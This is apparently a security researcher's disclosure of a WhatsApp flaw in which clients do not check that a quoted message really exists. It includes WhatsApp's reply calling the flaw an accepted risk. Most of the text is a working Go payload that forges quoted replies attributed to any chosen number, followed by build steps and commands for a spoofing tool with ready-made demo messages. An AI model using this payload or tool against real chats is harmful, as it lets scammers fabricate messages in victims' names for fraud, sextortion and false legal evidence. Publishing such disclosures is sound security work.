All official WhatsApp clients, upon receiving a "Message Reply" payload (QuotedMessage), do not validate whether the "ContextInfo" of this "QuotedMessage" is valid/exists ("StanzaId" and "Participant"). This allows a malicious actor to send in private chats or groups a "QuotedMessage" of a message that never existed on behalf of another person. This is highly critical and dangerous.
Malicious individuals can use this to create issues such as:
- Arguments between couples
- Sextortion scams
- Frauds against financial institutions
- In Brazil, someone could take a cellphone to a notary office to register a "Notarial Act" to create a record that could be used in legal proceedings, claiming that the original message was deleted but keeping the evidence of the "QuotedMessage."
- Creating embarrassing situations involving public figures (famous actors, politicians, etc.)
Hi Gustavo,
Thanks for your report. This issue has been reported to us before, and we consider it to be an accepted risk. When someone replies to a message, the WhatsApp client copies the text available within the app and creates a graphical representation that helps people follow the conversation, the owner of this quoted message is always the person replying to the original message. WhatsApp uses end to end encryption and doesn’t store messages on its servers, therefore we don’t have a single source of truth for these messages. People always have the option of blocking a sender who tries to spoof messages and they can report problematic content to us. Although we appreciate the report, such issues do not qualify under our bug bounty program.
Thanks,
Teo
Latest version on all platforms
Users: UserA, UserB; UserA is not known by UserB
UserA (SCAMMER) sends a spoofed messages to UserB in response to a message that UserB did never send
Spoofed message payload:
msg := &waProto.Message{
ExtendedTextMessage: &waProto.ExtendedTextMessage{
Text: proto.String("Some text"),
ContextInfo: &waProto.ContextInfo{
StanzaId: proto.String("Some Random ID"), //Random ID
Participant: proto.String("5511999999999@s.whatsapp.net"), //Spoofed user ID
QuotedMessage: &waProto.Message{
Conversation: proto.String("Some Spoofed text"), //QuotedMessage Spoofed text
},
},
},
}Send the Spoofed Payload:
resp, err := cli.SendMessage(context.Background(), chatID, msg)
// chatID is the ID of the chat you want to send the message to, can be a group or the same number as the spoofed user ID
git clone https://github.com/lichti/whats-spoofing.gitcd whats-spoofing
go mod download
go get go build ./whats-spoofinggetgroup <jid>listgroupssend-spoofed-reply <chat_jid> <msgID:!|#ID> <spoofed_jid> <spoofed_text>|<text>send-spoofed-img-reply <chat_jid> <msgID:!|#ID> <spoofed_jid> <spoofed_file> <spoofed_text>|<text>send-spoofed-demo <toGender:boy|girl> <language:br|en> <chat_jid> <spoofed_jid>send-spoofed-demo-img <toGender:boy|girl> <language:br|en> <spoofed_jid> <spoofed_img>